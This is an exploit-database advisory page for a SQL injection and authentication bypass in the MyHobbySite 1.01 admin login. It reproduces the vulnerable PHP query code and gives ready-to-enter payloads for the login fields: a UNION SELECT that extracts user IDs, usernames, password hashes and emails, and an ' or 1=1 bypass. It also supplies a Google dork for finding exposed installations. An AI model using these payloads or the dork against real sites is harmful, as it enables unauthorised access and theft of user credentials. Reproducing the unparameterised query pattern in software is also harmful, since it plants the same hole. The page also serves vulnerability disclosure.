MyHobbySite 1.01 SQL injection, Bypass Authentication Vulnerability

vendor:

MyHobbySite

by:

YuGj VN

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: MyHobbySite

Affected Version From: 1.01

Affected Version To: 1.01

Patch Exists: NO

Related CWE: N/A

CPE: a:myhobbysite:myhobbysite:1.01

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

MyHobbySite 1.01 SQL injection, Bypass Authentication Vulnerability

MyHobbySite 1.01 is vulnerable to SQL injection and authentication bypass. An attacker can exploit this vulnerability by entering malicious SQL queries in the username and password fields. This can be done by entering ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- - in the username and password fields or by entering ' or 1=1-- - in the username and password fields. This vulnerability can only be exploited when magic_quote_gpc is set to Off.

Mitigation:

Ensure that magic_quote_gpc is set to On and input validation is performed on all user-supplied data.

Source

Exploit-DB raw data:

#########################################################################################
# Exploit Title: MyHobbySite 1.01 SQL injection, Bypass Authentication Vulnerability
# Date: 12-09-2010
# Author: YuGj VN
# Email: anhtuanittn.vn@gmail.com
# Software Link: http://www.myhobbysite.net/index.php?page=15
# Version: v1.01
#########################################################################################

Bug Code:
if (isset($_REQUEST['username']) and isset($_REQUEST['password'])) {
	// Get user info from the dataabse
	$_REQUEST['username'] = trim($_REQUEST['username']);
	$_REQUEST['password'] = trim($_REQUEST['password']);
	$usersettings = @mysql_query("SELECT * FROM " . $CONFIG['database_table_prefix'] . "users WHERE username='$_REQUEST[username]' AND password=md5('$_REQUEST[password]')");
	$usersettings = mysql_fetch_array($usersettings);
	if ($usersettings) {
		$_SESSION['logged_in'] = TRUE;
		$_SESSION['userid'] = $usersettings['id'];
		$_SESSION['user'] = $usersettings['username'];
		$_SESSION['pass'] = $usersettings['password'];
		$_SESSION['email'] = $usersettings['email'];
		$_SESSION['permissions'] = $usersettings['permissions'];
		UpdateLogs($usersettings['username'] . " logged into the Admin CP.");
	} else {
		$failed_login = TRUE;
	}
}

#########################################################################################

Exploit:

link exploit:  http://domain.com/admin/
# Enter in username field: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
# Enter in password field: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
# or
# Enter in username field: ' or 1=1-- -
# Enter in password field: ' or 1=1-- -
# 
#
# We can exploit only when magic_quote_gpc = Off
# Google dork: Powered by MyHobbySite 1.01
# 
#
#########################################################################################